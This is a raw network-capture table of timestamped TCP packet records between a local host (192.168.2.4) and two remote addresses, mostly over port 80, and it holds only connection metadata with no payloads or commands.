Nov 7, 2024 07:33:25.294433117 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294444084 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.294450998 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294461012 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294466019 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.294471025 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294482946 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294492960 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294503927 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294514894 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294516087 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.294574976 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.294588089 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.294823885 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294905901 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.294950008 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294961929 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294980049 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294990063 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294990063 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.295001984 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.295011997 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.295012951 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.295027018 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.295037031 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.295044899 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.295046091 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.295058012 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.295068026 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.295085907 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.295109987 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.295484066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.295495033 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.295505047 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.295515060 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.295523882 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.295526028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.295536995 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.295543909 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.295547962 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.295557976 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.295568943 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.295578957 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.295579910 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.295593023 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.295604944 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.295625925 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.295634985 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.296089888 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.296101093 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.296109915 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.296120882 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.296130896 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.296135902 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.296142101 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.296152115 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.296169043 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.296178102 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.296180010 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.296190023 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.296191931 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.296200991 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.296212912 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.296216011 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.296224117 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.296232939 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.296267033 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.323055983 CET	443	49898	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.329710960 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.329722881 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.329732895 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.329757929 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.329777002 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.329793930 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.329822063 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.329833984 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.329843998 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.329869986 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.329910994 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.329921961 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.329961061 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.330039024 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.330049992 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.330060005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.330080032 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.330095053 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.330161095 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.330169916 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.330195904 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.330215931 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.330274105 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.330284119 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.330293894 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.330305099 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.330307961 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.330315113 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.330324888 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.330327034 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.330352068 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.330390930 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.330502987 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.330513954 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.330524921 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.330545902 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.330568075 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.330626965 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.330637932 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.330647945 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.330660105 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.330679893 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.330754042 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.330765009 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.330774069 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.330796957 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.330810070 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.335829020 CET	49902	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.335846901 CET	443	49902	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.371697903 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.371727943 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.371737957 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.371777058 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.371814013 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.411890030 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.411911011 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.411921978 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.411969900 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.412009001 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.412044048 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.412058115 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.412069082 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.412080050 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.412094116 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.412098885 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.412122965 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.412137985 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.412272930 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.412283897 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.412296057 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.412323952 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.412348986 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.412586927 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.412597895 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.412622929 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.412631989 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.412633896 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.412646055 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.412656069 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.412658930 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.412667990 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.412678003 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.412683964 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.412689924 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.412712097 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.412729979 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.412847996 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.412888050 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.412975073 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.412991047 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.413001060 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.413012028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.413012981 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.413023949 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.413027048 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.413033962 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.413045883 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.413045883 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.413058043 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.413069010 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.413070917 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.413079023 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.413089037 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.413110018 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.413410902 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.413423061 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.413458109 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.413608074 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.413619995 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.413630009 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.413640976 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.413645029 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.413650990 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.413662910 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.413672924 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.413672924 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.413683891 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.413695097 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.413707018 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.413721085 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.413729906 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.414074898 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414087057 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414097071 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414108038 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414119005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414129972 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414135933 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.414139986 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414151907 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414160967 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414165974 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.414171934 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414182901 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.414186001 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414196968 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414203882 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.414207935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414222002 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.414247990 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.414654970 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414664984 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414674044 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414683104 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414693117 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414694071 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.414705038 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414716959 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414721012 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.414729118 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.414748907 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.414758921 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.415055037 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415066004 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415076017 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415086985 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415096045 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415101051 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.415110111 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415119886 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415131092 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415132046 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.415143013 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415147066 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.415153027 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415163994 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415165901 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.415184975 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.415206909 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.415477991 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415488005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415498018 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415508986 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415529013 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.415555000 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.415574074 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415585995 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415596008 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415607929 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415615082 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.415617943 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415627956 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415642977 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.415656090 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415656090 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.415668011 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415678024 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415688038 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415690899 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.415698051 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415709019 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415714025 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.415719986 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415731907 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415743113 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415745020 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.415751934 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.415759087 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.415790081 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.415801048 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.416433096 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.416444063 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.416454077 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.416469097 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.416475058 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.416479111 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.416491032 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.416501999 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.416520119 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.449069023 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449079990 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449120045 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.449139118 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.449265957 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449286938 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449302912 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449311018 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.449323893 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.449347019 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.449392080 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449405909 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449414968 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449429989 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.449445963 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.449501991 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449579954 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449593067 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.449595928 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449620962 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.449645996 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.449668884 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449678898 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449687958 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449717045 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.449740887 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.449783087 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449791908 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449831963 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.449892044 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449908018 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449918032 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449928999 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449939013 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.449939013 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.449970961 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.450093031 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.450119019 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.450130939 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.450167894 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.450179100 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.450187922 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.450215101 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.450239897 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.450294018 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.450304031 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.450313091 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.450340986 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.450365067 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.491286993 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.491298914 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.491305113 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.491451025 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.531333923 CET	443	49898	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.533116102 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.533154011 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.533166885 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.533200026 CET	49898	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.533212900 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.533263922 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.533302069 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.533313036 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.533323050 CET	80	49882	185.215.113.16	192.168.2.4
